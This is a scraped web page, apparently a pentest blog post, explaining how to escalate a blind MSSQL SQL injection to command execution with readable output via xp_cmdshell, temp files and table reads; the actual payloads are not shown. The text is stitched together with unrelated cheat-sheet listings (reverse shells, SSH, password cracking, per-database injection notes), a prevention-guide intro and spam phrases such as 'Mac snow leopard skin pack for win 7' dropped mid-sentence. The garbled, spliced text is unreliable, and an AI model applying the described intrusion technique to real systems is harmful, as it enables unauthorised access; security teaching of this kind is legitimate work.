Once again, I’m back with another story of an interesting finding. This time I’ll be explaining an SQL injection instance, but this was bit different. The application here is based on ASP.Net, is using MSSQL, supports stacked queries and the DB user is also sysadmin. Everything looks nice and perfect to execute xp_cmdshell. The only problem I faced is that I cannot get the output of queries stacked after the first query. And on top of that, the application is behind a firewall that is not allowing any access to outside world. So, I can execute OS commands, yes, but cannot see it’s output. This becomes a kind of blind RCE. But, as the title says, this is a not-so-blind RCE.
Ingres SQL Injection Cheat Sheet Saturday, July 7th, 2007 Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier. SQL Injection Prevention Cheat Sheet¶ Introduction¶ This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. Mac snow leopard skin pack for win 7. SQL Injection attacks are unfortunately very common, and this is due to two factors: the significant prevalence of SQL Injection vulnerabilities,. Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection.
I have set up an identical test environment to demonstrate the exact problem we have in hand. Let’s see how we will extract the output of xp_cmdshell here.
Performing the UNION based SQL Injection
First, let’s analyse the vulnerable request and try to perform a UNION based SQL Injection. Looking at the screenshot below, the txtUserName parameter is vulnerable to SQL Injection.
Naturally, we’ll try to close the query with a comment. But we get another error when we do so:
The error says basicsalary is an invalid column name. By closely observing the part of the query disclosed in the error message with only a single quote as payload, we find that the query has Payslips table being joined. Maybe this basicsalary column is part of that table. In that case, we also need to join Payslips table in our payload before we comment rest of the query out. Let’s try that:
The query executes and we have some data! We’ll proceed further with typical ORDER BY and then UNION statements to gain a working UNION based SQL Injection:
Pentestmonkey Sql Injection Cheat Sheet
Checking the privileges of DB user
The next step here is to check if the DB user is a sysadmin or not, since only sysadmin can enable xp_cmdshell and execute OS level commands, which is our ultimate goal here.
Here I would like to introduce an awesome SQL Injection Cheat Sheet that I use. It is from pentestmonkey. Looking at this cheat sheet, we find that we can use SELECT is_srvrolemember('sysadmin') query to figure out if our current DB user is sysadmin or not. Let’s try that:
Since we get a 1 in the response, we can confirm that the current DB user is indeed a sysadmin.
Checking the support for stacked queries
Stacked queries means that we can run multiple queries in a single statement by separating them with a semicolon character, just like we can do in command line. So if we have a query like this:
With stacked queries supported, we can run queries like this:
Without stacked queries, we are only limited to SELECT statements and cannot run any INSERT, UPDATE, DELETE or something like EXEC queries. But with stacked queries, we can execute any kind of query we want. That’s why peeps, without stacked queries, don’t mark any integrity impact in the CVSS vector.
Anyways, moving ahead, let’s check if the stacked queries are supported or not. We will stack a waitfor delay query after our query and see if it executes:
A delay of 5 seconds here confirm that the stacked queries are supported. Now let’s see if we are able to get the output of stacked queries too. To do so, we’ll stack our SELECT 1,2,3,4 instead of using UNION:
Notice that we do not get any output for our SELECT 1,2,3,4, which means we’ll not get any output for the queries we will stack after the initial query.
Executing xp_cmdshell
Now let’s enable xp_cmdshell and confirm if we are at least able to execute OS command. To do that, refer back to the cheat sheet. Following SQL commands needs to executed:
Let’s do that:
Awesome! We have enabled xp_cmdshell. Now let’s test that:
A delay of 3 seconds (for a default of 4 pings) show that we indeed have command execution! At this moment, what we can do is try to connect back to our VPS server and gain a working shell. If the application is behind a firewall configured to block outgoing connections, but is still allowing DNS queries, you can use a cool DNS exfiltration method described here. But the firewall in our case is not allowing any outside interaction. So far, we are stuck with a blind RCE.
Escalating blind RCE to not-so-blind RCE
What we can do maybe is run a command and redirect its output to a file, a file which is inside the webroot and we can access that file from the website itself. For instance, if our website is hosted in C:inetpubwwwroot, we will use xp_cmdshell to execute a command like whoami > C:inetpubwwwrootopt.txt and then browse http:site.comopt.txt to get the output of whoami Free to play games for mac. command.
Well…
We do not know the physical path of the website in this scenario. So we have to somehow read the file in some other way. Looking back at our good old cheat sheet, we do find a way! We can execute following queries to read a file:
Let’s use this method. First, let’s execute our command and store it’s output in a temporary file:
Now, we’ll create a table and store the contents of our temporary file in that table:
Once we have the contents in our table, let’s read it using the UNION query we have:
And boom! We can now read the output of commands we want to execute!
Cheat Sheets
Pentestmonkey Sql Injection Cheat Sheet Pdf
Reverse Shell Cheat Sheet
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding [..]
Tags: bash, cheatsheet, netcat, pentest, perl, php, python, reverseshell, ruby, xterm
Posted in: Shells
SSH Cheat Sheet
SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features. NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples. SOCKS Proxy Set up a SOCKS proxy on 127.0.0.1:1080 that lets [..]
Tags: pentest, ssh
Posted in: Cheat Sheets
John The Ripper Hash Formats
John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options. I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general. Sometimes I stumble across hashes on a [..] Blackvue viewer for mac.
Tags: johntheripper, pentest
Posted in: Cheat Sheets
Informix SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Informix databases…
Tags: cheatsheet, database, informix
Posted in: SQL Injection
MSSQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MSSQL databases…
Tags: cheatsheet, mssql, sqlinjection
Posted in: SQL Injection
Oracle SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Oracle databases…
Tags: cheatsheet, database, oracle, pentest, sqlinjection
Posted in: SQL Injection
MySQL SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MySQL databases…
Tags: cheatsheet, database, mysql, pentest, sqlinjection
Posted in: SQL Injection
Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
Tags: cheatsheet, database, pentest, postgresql, sqlinjection
Posted in: SQL Injection
DB2 SQL Injection Cheat Sheet
Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared…
Tags: cheatsheet, database, db2, pentest, sqlinjection
Posted in: SQL Injection
Ingres SQL Injection Cheat Sheet
Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.
Tags: cheatsheet, database, ingres, pentest, sqlinjection
Posted in: SQL Injection
Comments are closed.